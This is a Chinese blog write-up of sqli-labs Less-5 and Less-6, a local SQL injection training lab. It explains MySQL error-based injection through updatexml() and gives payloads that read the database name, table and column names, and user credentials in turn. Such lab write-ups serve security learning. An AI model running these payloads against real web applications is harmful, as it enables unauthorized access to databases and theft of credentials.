
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8" />
    <title>less5-6 | blackceng的小窝</title>
    <meta name="author" content="blackceng" />
    <meta name="description" content="我们要做的，就是追上那该死的火车，CJ！" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 8.1.1"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>BLACKCENG的小窝</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;BLACKCENG的小窝</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>less5-6</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2025/12/24
        </span>
        
        <span class="category">
            <a href="/categories/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84sql%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                从零开始的sql注入生活
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/sql-lab/" style="color: #ffa2c4">
                    sql_lab
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h1><p>在探讨SQL注入之报错注入之前，有一个前提就是页面能够响应详细的错误描述，然而mysql数据库中显示错误描述是因为开发程序中采用了<code>print_r mysql_error()</code>函数，将mysql错误信息输出。</p>
<h2 id="updatexml（）函数"><a href="#updatexml（）函数" class="headerlink" title="updatexml（）函数"></a><strong>updatexml（）函数</strong></h2><ul>
<li><p>updatexml（）是一个使用不同的xml标记匹配和替换xml块的函数。</p>
</li>
<li><p>作用：改变文档中符合条件的节点的值</p>
</li>
<li><p>语法： <code>updatexml（XML_document，XPath_string，new_value）</code> 第一个参数：是string格式，为XML文档对象的名称，文中为Doc 第二个参数：代表路径，Xpath格式的字符串例如&#x2F;&#x2F;title【@lang】 第三个参数：string格式，替换查找到的符合条件的数据</p>
</li>
<li><p>updatexml使用时，当xpath_string格式出现错误，mysql则会爆出xpath语法错误（xpath syntax）</p>
</li>
<li><p>例如： <code>select * from test where ide = 1 and (updatexml(1,0x7e,3));</code> 由于0x7e是~，不属于xpath语法格式，因此报出xpath语法错误。</p>
</li>
<li><h2 id="updatexml-的报错机制："><a href="#updatexml-的报错机制：" class="headerlink" title="updatexml 的报错机制："></a><strong><code>updatexml</code> 的报错机制</strong>：</h2></li>
<li><p><code>updatexml()</code> 在解析错误的 XPath 时，会返回 <strong>第一个非法字符开始的部分字符串</strong>。</p>
</li>
<li><p>当</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">concat(1, (select database()))</span><br></pre></td></tr></table></figure>

<p>生成</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&quot;1security&quot;</span><br></pre></td></tr></table></figure>

<p>时：</p>
<ul>
<li><code>1</code> 是合法的 XPath 数字（不会触发报错）。</li>
<li><code>s</code>（<code>security</code> 的第一个字母）是非法 XPath 字符，所以报错从 <code>s</code> 开始截取。</li>
</ul>
</li>
<li><p><strong>为什么 <code>1</code> 没有显示</strong>：</p>
<ul>
<li><code>1</code> 是合法的 XPath 数字，不会触发报错，所以被忽略。</li>
<li>报错信息 <strong>只显示第一个非法位置之后的内容</strong> （即 <code>security</code>）。</li>
</ul>
</li>
<li></li>
</ul>
<h1 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h1><h2 id="1-测试包裹的符号"><a href="#1-测试包裹的符号" class="headerlink" title="1.测试包裹的符号"></a>1.测试包裹的符号</h2><p>  <code>http://127.0.0.1/sqli-labs-master/Less-5/?id=1&#39;</code></p>
<p>  <code>http://127.0.0.1/sqli-labs-master/Less-5/?id=1&#39; and 1=1--+</code></p>
<p>  <code>http://127.0.0.1/sqli-labs-master/Less-5/?id=1&#39; and 1=2--+</code></p>
<p>  在添加单引号后出现报错且1&#x3D;1时正常回显 1&#x3D;2时不回显。</p>
<h2 id="2-判断列数"><a href="#2-判断列数" class="headerlink" title="2.判断列数"></a>2.判断列数</h2><h2 id=""><a href="#" class="headerlink" title=""></a><img src="/images/QQ_1766578201518.png"></h2><p><img src="/less5-7/e00e07f3-4c84-413e-a950-ede95d438183.png"></p>
<p>得到列数为三行</p>
<h1 id="联合注入和报错注入的不同"><a href="#联合注入和报错注入的不同" class="headerlink" title="联合注入和报错注入的不同"></a>联合注入和报错注入的不同</h1><ul>
<li><p>联合查询注入要求 <strong>前一个查询返回空结果</strong> ，才能让后续的 <code>union</code> 查询结果显示出来。如果前一个查询有结果（如 <code>id=1</code> 存在），数据库会优先显示它的结果，而 <code>union</code> 部分的数据会被忽略。</p>
</li>
<li><p>报错注入依赖 <strong>SQL 语句执行并触发错误</strong> ，所以 <strong>前面的条件必须为真</strong> ，否则整个语句不会执行。如果 <code>id=-1</code> 不存在，<code>and</code> 后面的 <code>updatexml</code> 就不会执行，也就不会报错。</p>
</li>
<li><h2 id="获取基本信息"><a href="#获取基本信息" class="headerlink" title="获取基本信息"></a>获取基本信息</h2></li>
<li><p><code>?id=1&#39; and updatexml(1,concat(1,(select database())),3) --+</code></p>
</li>
<li><p><img src="/images/QQ_1766578749371.png"></p>
</li>
</ul>
<p>得到数据库名security</p>
<p>接着再获取表名</p>
<p><code>?id=1&#39; and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where</code></p>
<p> table_schema &#x3D; ‘security’)),3) –+&#96;</p>
<p><img src="/images/QQ_1766579624787.png"></p>
<p>显然我们需要users里的内容</p>
<p><code>?id=1&#39; and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where</code></p>
<p><code> table_schema=&#39;security&#39; and table_name=&#39;users&#39;)),1)--+</code></p>
<p><img src="/images/QQ_1766580129880.png"></p>
<p>得到 username 和 password</p>
<p><img src="/images/image-20251224204900745.png"></p>
<p><code>?id=1%27%20and%20updatexml(1,concat(1,(select concat(username,&#39;~&#39;,password) from users limit 0,1)),1)--+</code></p>
<p>得到用户名和密码</p>
<p>less6也是同理</p>
<p>只是符号从’变为”而已</p>
<p>故不再重复</p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2025 blackceng的小窝
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;blackceng
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
<canvas
    id="fireworks"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: 32767"
></canvas>
<script src="https://s4.zstatic.net/ajax/libs/animejs/3.2.1/anime.min.js"></script>
<script src="/js/fireworks.min.js"></script>
<link rel="stylesheet" href="/css/<file>" />
</body>
</html>
